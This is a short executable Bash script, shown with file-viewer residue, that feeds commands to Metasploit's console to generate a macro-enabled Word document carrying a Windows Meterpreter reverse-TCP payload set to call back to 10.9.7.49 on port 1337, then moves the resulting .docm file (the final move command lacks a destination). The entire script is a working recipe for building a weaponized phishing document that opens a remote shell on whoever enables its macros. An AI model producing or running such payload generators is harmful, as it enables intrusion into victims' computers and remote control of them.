11 lines
208 B
Bash
Executable File
11 lines
208 B
Bash
Executable File
msfconsole <<EOF
|
|
set payload windows/meterpreter/reverse_tcp
|
|
use exploit/multi/fileformat/office_word_macro
|
|
set LHOST 10.9.7.49
|
|
set LPORT 1337
|
|
#show options
|
|
exploit
|
|
exit
|
|
EOF
|
|
mv /home/siv/.msf4/local/msf.docm
|